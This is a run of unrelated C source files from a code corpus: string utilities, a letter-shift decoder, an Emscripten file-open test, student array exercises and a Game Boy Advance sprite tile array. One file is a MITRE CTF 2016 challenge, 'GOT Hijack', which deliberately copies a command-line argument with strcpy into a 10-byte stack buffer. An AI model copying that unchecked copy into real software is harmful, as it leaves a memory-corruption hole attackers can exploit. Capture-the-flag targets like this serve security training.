while(fclose(src) !=0 || fclose(dest)!= 0)
fprintf(stderr,"Error in closing file\n");
return 0;
}
|
the_stack_data/335281.c | #include <stdio.h>
#include <string.h>
int main()
{
int k;
char str[11], s[500], c;
char a[] = {'V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U' };
while(scanf("%s%*c", str) && strlen(str) < 6)
{
if(str[0] == 'S')
{
k = 0;
while(c = getchar())
{
if(c >= 'A' && c <= 'Z') s[k++] = a[c - 'A'];
else if(c == '\n')
{
break;
}
else s[k++] = c;
}
}
else
{
s[k] = '\0';
puts(s);
}
}
return 0;
}
|
the_stack_data/2323.c | //------------------------------------------
// GOT Hijack - Who is the best GoT character?!
// MITRE CTF 2016
//
// Compilation:
// gcc GOT.c -o GoT
//
// Usage:
// ./GoT <Game_of_Thrones_Char_1> <Game_of_Thrones_Char_2>
// NOTE: First names only
//
// contact: [email protected]
//------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
struct entry {
char *str;
int n;
};
// Accepts first names, power totals calculated with FOUO proprietary algorithms
struct entry dict[] = {
"Jon", 9999,
"Daenerys", 910,
"Gregor", 61,
"Arya", 999,
"Melisandre", 26,
"Cersei", 98,
"Sansa", 3,
"Ramsay", 63,
"Margaery", 50,
"Sandor", 99,
"Gendry", 7,
"Eddard", -2,
"Petyr", 80,
"Hodor", 1000000,
"Catelyn", -4,
"Tyrion", 920,
"Shae", 54,
"Joffery", -90203,
"Varys", 444,
"Bran", 999,
"Brienne", 999,
"Tormund", 891,
"Ygritte", 4,
"Theon", 4,
"Robb", -100,
"Stannis", -1000,
"Jaime", 997,
"Sam", -1,
"Samwell", -1,
0,0
};
int calculate_power(char* name_for_calc,char* input){
int power_lvl = 0;
strcpy(name_for_calc, input);
printf("Calculating power for %s...\n", name_for_calc);
int i = 0;
char *key = dict[i].str;
while(key){
if(strcmp(name_for_calc,key) == 0){
return dict[i].n;
}
key = dict[++i].str;
}
// Return 0 if name not found in GoT db
return power_lvl;
}
int main(int argc, char* argv[]){
// Output proper usage
if(argc != 3){
printf("You know nothing Jon Snow..\n\nUsage:\n\t./GoT <Game_of_Thrones_Char_First_Name> <Game_of_Thrones_Char_2>\n\tEx: ./GoT Daenerys Cersei\n\tDaenerys wins! (obviously)\n");
exit(1);
}
// Initialize name storage and other variables
char* character_ptr = NULL;
char character_name_storage[10];
character_ptr = character_name_storage;
int first_pwr_lvl = 0;
int second_pwr_lvl = 0;
// Calculate character power levels
first_pwr_lvl = calculate_power(character_ptr, argv[1]);
second_pwr_lvl = calculate_power(character_ptr, argv[2]);
//Calculate and output the victor
if(first_pwr_lvl == second_pwr_lvl){
printf("This match is too even to decide. Both characters are equally awesome (or terrible)..\n");
}
else if(first_pwr_lvl > second_pwr_lvl){
printf("The winner is %s! (obviously)\n", argv[1]);
}
else{
printf("The clear winner is %s! (obviously)\n", argv[2]);
}
return 0;
}
|
the_stack_data/152795.c | #include<stdio.h>
int main(){
int n;
scanf("%d",&n);
int i = 0,k = 1;
//常规方法
/*while(n > 0){
n -= k;
k *= 2;
i++;
}
*/
//二进制方法
//效率更高
while(n){
/* n -= k; */
/* k = k << 1; */
/* printf("n = %d\n",n); */
n = n >> 1;
i++;
}
printf("%d\n",i);
}
|
the_stack_data/29825676.c | #include <stdio.h>
char *mystrstr(char *haystack, char *needle);
char *mystrcpy(char *dest, char *src);
char *mystrcat(char *dest, char *src);
int mystrcmp(char *s1, char *s2);
int main(void)
{
char *p1 = "llab";
char *p2 = "lla";
char *ret = NULL;
char str[100] = "good morning";
char str2[] = "hello";
ret = mystrstr(p1, p2);
if (ret == NULL)
printf("%s没有%s\n", p1, p2);
else
printf("%s\n", ret);
printf("%s\n", mystrcpy(str, str2));
printf("%s\n", mystrcat(str, str2));
printf("%d\n", mystrcmp(p1, p2));
return 0;
}
// 字符串中找子串
char *mystrstr(char *haystack, char *needle)
{
char *hay_next, *needle_next;
while (*haystack) {
if (*haystack == *needle) {
hay_next = haystack+1;
needle_next = needle+1;
while (*needle_next != '\0') {
if (*hay_next != *needle_next)
break;
hay_next++;
needle_next++;
}
if (*needle_next == '\0')
return haystack;
}
haystack ++;
}
return NULL;
}
char *mystrcpy(char *dest, char *src)
{
char *ret = dest;
while ((*dest = *src) != '\0') {
dest ++;
src ++;
}
return ret;
}
char *mystrcat(char *dest, char *src)
{
char *ret = dest;
while (*dest != '\0')
dest ++;
mystrcpy(dest, src);
return ret;
}
int mystrcmp(char *s1, char *s2)
{
#if 0
while (*s1 != '\0' || *s2 != '\0') {
if (*s1 != *s2)
return *s1 - *s2;
s1 ++;
s2 ++;
}
return 0;
#endif
while (*s1 == *s2) {
if (!*s1)
return 0;
s1 ++;
s2 ++;
}
return *s1 - *s2;
}
|
the_stack_data/107952299.c | /*
* Copyright 2011 The Emscripten Authors. All rights reserved.
* Emscripten is available under two separate licenses, the MIT license and the
* University of Illinois/NCSA Open Source License. Both these licenses can be
* found in the LICENSE file.
*/
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
char nonexistent_name[] = "noexist-###";
void create_file(const char *path, const char *buffer, int mode) {
int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, mode);
assert(fd >= 0);
assert(!errno);
int err = write(fd, buffer, sizeof(char) * strlen(buffer));
assert(err == (sizeof(char) * strlen(buffer)));
assert(!errno);
close(fd);
assert(!errno);
}
void setup() {
create_file("test-file", "abcdef", 0777);
mkdir("test-folder", 0777);
assert(!errno);
}
void cleanup() {
unlink("test-file");
rmdir("test-folder");
for (int i = 0; i < 3; i++) {
for (int j = 0; j < 32; j++) {
sprintf(nonexistent_name, "noexist-%c%d", 'a' + i, j);
unlink(nonexistent_name);
}
}
errno = 0;
unlink("creat-me");
assert(!errno);
}
void test() {
struct stat s;
int modes[] = {O_RDONLY, O_WRONLY, O_RDWR};
for (int i = 0; i < 3; i++) {
for (int j = 0; j < 32; j++) {
int flags = modes[i];
if (j & 0x1) flags |= O_CREAT;
if (j & 0x2) flags |= O_EXCL;
if (j & 0x4) flags |= O_TRUNC;
if (j & 0x8) flags |= O_APPEND;
if (j & 0x16) flags |= O_NOCTTY;
printf("EXISTING FILE %d,%d\n", i, j);
int success = open("test-file", flags, 0777) != -1;
printf("success: %d\n", success);
printf("errno: %d\n", errno);
if ((flags & O_CREAT) && (flags & O_EXCL)) {
assert(!success);
assert(errno == EEXIST);
} else {
assert(success);
assert(errno == 0);
}
errno = 0;
int ret = stat("test-file", &s);
assert(ret == 0);
assert(errno == 0);
printf("st_mode: 0%o\n", s.st_mode & 037777777000);
assert((s.st_mode & 037777777000) == 0100000);
memset(&s, 0, sizeof s);
printf("\n");
errno = 0;
printf("EXISTING FOLDER %d,%d\n", i, j);
success = open("test-folder", flags, 0777) != -1;
printf("success: %d\n", success);
printf("errno: %d\n", errno);
if ((flags & O_CREAT) && (flags & O_EXCL)) {
assert(!success);
assert(errno == EEXIST);
} else if ((flags & O_TRUNC) || i != 0 /*mode != O_RDONLY*/) {
assert(!success);
assert(errno == EISDIR);
} else {
assert(success);
assert(errno == 0);
}
errno = 0;
ret = stat("test-folder", &s);
assert(ret == 0);
assert(errno == 0);
printf("st_mode: 0%o\n", s.st_mode & 037777777000);
assert((s.st_mode & 037777777000) == 040000);
memset(&s, 0, sizeof s);
printf("\n");
errno = 0;
sprintf(nonexistent_name, "noexist-%c%d", 'a' + i, j);
printf("NON-EXISTING %d,%d\n", i, j);
success = open(nonexistent_name, flags, 0777) != -1;
printf("success: %d\n", success);
printf("errno: %d\n", errno);
if ((flags & O_CREAT)) {
assert(success);
assert(errno == 0);
} else {
assert(!success);
assert(errno == ENOENT);
}
ret = stat(nonexistent_name, &s);
printf("st_mode: 0%o\n", s.st_mode & 037777777000);
if ((flags & O_CREAT)) {
assert(ret == 0);
assert((s.st_mode & 037777777000) == 0100000);
} else {
assert(ret != 0);
assert((s.st_mode & 037777777000) == 0);
}
memset(&s, 0, sizeof s);
printf("\n");
errno = 0;
}
}
printf("CREAT\n");
printf("success: %d\n", creat("creat-me", 0777) != -1);
printf("errno: %d\n", errno);
errno = 0;
}
int main() {
atexit(cleanup);
signal(SIGABRT, cleanup);
setup();
test();
#ifdef REPORT_RESULT
REPORT_RESULT(0);
#endif
return EXIT_SUCCESS;
}
|
the_stack_data/82168.c | #include <stdio.h>
#include <stdlib.h>
int main(){
int iVetorA[10],iVetorB[10],iVetorC[10],i;
for(i =0;i<10;++i)
{
printf("Digite o primeiro vetor [%d] posicao: ",i);
scanf("%d",&iVetorA[i]);
}
for(i =0;i<10;++i)
{
printf("\n Digite o segundo vetor [%d] posicao: ",i);
scanf("%d",&iVetorB[i]);
}
for(i=0;i<10;++i){
iVetorC[i]=iVetorA[i];
iVetorC[++i]=iVetorB[i];
}
for(i =0;i<10;++i)
printf("Os valores do primeiro e do segundo vetor digitados e: [%d]: %d\n",i,iVetorC[i]);
system("pause");
}
|
the_stack_data/90762985.c | #import <stdio.h>
void recec(int a ){
if (a > 0){
printf("\n[%d]",a);
recec(a -1);
printf("\n<%d>",a);
}
}
int main(){
recec(20);
return 0;
} |
the_stack_data/384807.c | #pragma once
//{{BLOCK(bat_finished)
//======================================================================
//
// bat_finished, 32x192@8,
// + 96 tiles not compressed
// Total size: 6144 = 6144
//
// Time-stamp: 2022-01-25, 15:03:45
// Exported by Cearn's GBA Image Transmogrifier, v0.8.17
// ( http://www.coranac.com/projects/#grit )
//
//======================================================================
const unsigned int bat_finishedTiles[1536] __attribute__((aligned(4))) __attribute__((visibility("hidden")))=
{
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000D0F,0x0D18000E,0x00000011,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x0D000000,0x00000000,0x0C141400,0x00000000,0x0C110D00,0x00000000,0x0D0C0000,
0x00000000,0x0F000000,0x121A0000,0x1C000000,0x08041A00,0x18000015,0x0805071A,0x0D181708,
0x13110D0C,0x00000000,0x0F0D1111,0x00000000,0x090A0C0D,0x00001709,0x0D0D0D0C,0x00160C0D,
0x130D0C0B,0x0000001D,0x0E0B0A0D,0x00000000,0x0E0C0A0D,0x0000001E,0x1809090B,0x00000017,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x0608171C,0x09080808,0x00000000,0x03010100,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00060A09,0x00000000,0x04040404,0x00000004,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00190000,0x00000000,0x0A0C1900,
0x00000000,0x0D0C1416,0x00000000,0x110D0D1B,0x00000000,0x0C0D111B,0x00000000,0x0D0C1116,
0x00000000,0x00000000,0x000C0000,0x00000000,0x001E0D0E,0x00000000,0x00000C0D,0x00000000,
0x00001E0D,0x00000000,0x00001C0C,0x00000000,0x0F0C0C0C,0x00000000,0x0000110D,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x0C0D0B1A,0x00000000,0x110C1C00,0x00000000,0x0D090000,0x00000000,0x0D000000,
0x00000000,0x09000000,0x121A0000,0x0C1C0000,0x08041A00,0x0D0C1C15,0x0805071C,0x090B0C09,
0x0000090B,0x00000000,0x000A0C0D,0x00000000,0x1E0D1111,0x00000000,0x11111114,0x0000000C,
0x110C0C11,0x0000001E,0x1E0D0A0D,0x00000000,0x00110D0A,0x00000000,0x1A110C09,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x06121C00,0x09090808,0x00000000,0x04030100,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x040A0909,0x0000001A,0x00060404,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x19000000,0x00000000,0x0F190000,0x00000000,0x080C0000,
0x00000000,0x040B0000,0x121A0000,0x0C090C1E,0x08041A00,0x0C0C0803,0x0805071A,0x04080104,
0x00000000,0x00000000,0x0000001C,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x12000019,0x00000000,0x1E091311,0x00000000,0x1E02040B,0x00000000,0x08080302,0x0000001C,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x0608171C,0x09030104,0x00000000,0x04010101,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x0C0C0A0A,0x0000001A,0x02080C0A,0x00000015,0x00000000,0x00001512,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x121A0000,0x00000000,0x09041A00,0x00000015,0x0805071A,0x00001209,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x0608171C,0x17100A09,0x1E000000,0x0B090C0F,0x00000000,0x110C0B16,0x1E000000,0x11110B0C,
0x1D000000,0x11110C0A,0x16000000,0x0D11110C,0x0C000000,0x0D11110D,0x0C000000,0x11111111,
0x00001217,0x00000000,0x090A0C0C,0x00000015,0x00040C11,0x00000012,0x00001E11,0x00000000,
0x0000130D,0x00000000,0x000C0C0B,0x00000000,0x0000090A,0x00000000,0x0000001C,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x111E0000,0x1D111111,0x110D0000,0x00131111,0x11111D00,0x00130D0D,0x16111100,0x00161717,
0x00131400,0x00000000,0x001E1400,0x00000000,0x00001E00,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x121A0000,0x00000000,0x09041A00,0x00000015,0x0805071A,0x00001709,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0000001C,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x0908171C,0x09090909,0x00000000,0x0909090F,0x00000000,0x0C090916,0x00000000,0x0D090C16,
0x00000000,0x0D090C16,0x00000000,0x0D0A0D1E,0x00000000,0x0D0C1400,0x00000000,0x110D1400,
0x15170E09,0x00000000,0x1E04090C,0x00000004,0x00001C11,0x00000000,0x00001611,0x00000000,
0x18160D11,0x0000001C,0x090A0D11,0x00000012,0x0A0D1111,0x0000001A,0x16111111,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x0D111400,0x00000000,0x11141100,0x00000000,0x11140000,0x00000000,0x11110000,
0x00000000,0x0D0C0000,0x00000000,0x1E190000,0x00000000,0x00000000,0x00000000,0x00000000,
0x16110D0B,0x00000000,0x0D0D0B0C,0x0000001D,0x0B09090D,0x0000000E,0x1717100D,0x00000012,
0x0000000D,0x00000000,0x00001C0C,0x00000000,0x00000C00,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x121A0000,0x00000000,0x08041A00,0x14111D17,0x0905071A,0x0A0A0B0D,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00001914,0x00000000,0x1E190D11,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x0608171C,0x03020308,0x00000000,0x04030100,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x0A0C0D09,0x00001E18,0x0B0D0802,0x000C0B0B,0x0C1E0000,0x0C0C0C0C,0x1C000000,0x0A0F0019,
0x00000000,0x0E000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0000000F,0x00000000,
0x00000017,0x00000000,0x0000001A,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
};
//}}BLOCK(bat_finished)
|
the_stack_data/50137488.c | /***
* This code is a part of EvoApproxLib library (ehw.fit.vutbr.cz/approxlib) distributed under The MIT License.
* When used, please cite the following article(s): V. Mrazek, L. Sekanina, Z. Vasicek "Libraries of Approximate Circuits: Automated Design and Application in CNN Accelerators" IEEE Journal on Emerging and Selected Topics in Circuits and Systems, Vol 10, No 4, 2020
* This file contains a circuit from a sub-set of pareto optimal circuits with respect to the pwr and mse parameters
***/
// MAE% = 0.00 %
// MAE = 0
// WCE% = 0.00 %
// WCE = 0
// WCRE% = 0.00 %
// EP% = 0.00 %
// MRE% = 0.00 %
// MSE = 0
// PDK45_PWR = 0.082 mW
// PDK45_AREA = 247.3 um2
// PDK45_DELAY = 0.92 ns
#include <stdint.h>
#include <stdlib.h>
